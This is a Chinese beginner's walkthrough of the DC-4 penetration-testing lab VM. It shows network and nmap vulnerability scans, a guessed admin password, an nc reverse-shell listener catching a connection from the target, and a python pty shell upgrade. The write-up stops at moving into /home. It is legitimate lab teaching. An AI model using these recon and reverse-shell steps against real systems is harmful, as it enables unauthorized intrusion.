DC-4渗透靶机详解

萌新DC系列靶机渗透详解之 DC-4

“DC-3好难呜呜,先打DC-4”

1. 明确目标

获得靶机 root 权限,找到root账户下的 flag

2. 信息收集

使用 arp-scan 扫描网段下的主机
└─# arp-scan -l                                                                                                                                                                                                         

Interface: eth0, type: EN10MB, MAC: 00:0c:29:f2:1a:d5, IPv4: 192.168.1.103
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1     64:6e:97:04:b5:22       (Unknown)
192.168.1.101   58:a0:23:79:16:11       Intel Corporate
192.168.1.107   00:0c:29:aa:0f:0b       VMware, Inc.  <--虚拟机地址
192.168.1.102   64:6e:97:f4:58:64       (Unknown)
192.168.1.105   d4:d2:d6:a1:b9:28       (Unknown)
192.168.1.108   64:6e:97:f4:58:64       (Unknown)
192.168.1.100   48:2c:a0:e5:36:51       Xiaomi Communications Co Ltd
192.168.1.106   d4:d2:d6:a1:b9:28       (Unknown)

8 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.994 seconds (128.39 hosts/sec). 8 responded
使用nmap脚本,扫描主机信息
└─# nmap --script=vuln 192.168.1.107                                                                         


Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-02 09:49 CST
Nmap scan report for 192.168.1.107
Host is up (0.00018s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.107
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.1.107:80/
|     Form id: 
|     Form action: login.php
|     
|     Path: http://192.168.1.107:80/login.php
|     Form id: 
|_    Form action: login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:AA:0F:0B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 73.30 seconds
只有一个csrf的漏洞,没有什么用处
登录网站寻找信息

DC-4渗透靶机详解_第1张图片

看来是用 admin 登录

3. 漏洞利用

使用 burpsuite 爆破密码

由于用的是 usr/share/wordlist/dirb/big.txt,且用的不是专业版,一个一个爆破时间太久了

所以用绯红之王跳过了这一步骤,密码是happy

DC-4渗透靶机详解_第2张图片

用 burpsuite 抓包 尝试使用nc反弹控制台

DC-4渗透靶机详解_第3张图片

成功到手

└─# nc -lvp 4444                                                                 1 ⨯
listening on [any] 4444 ...
192.168.1.107: inverse host lookup failed: Unknown host
connect to [192.168.1.103] from (UNKNOWN) [192.168.1.107] 45952
ls   
command.php
css
images
index.php
login.php
logout.php
改善控制台环境
$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
www-data@dc-4:/usr/share/nginx/html$whoami                                          A
whoami
www-data
www-data@dc-4:/usr/share/nginx/html$ 
进入 /home 目录

你可能感兴趣的:(DC系列靶机,靶机)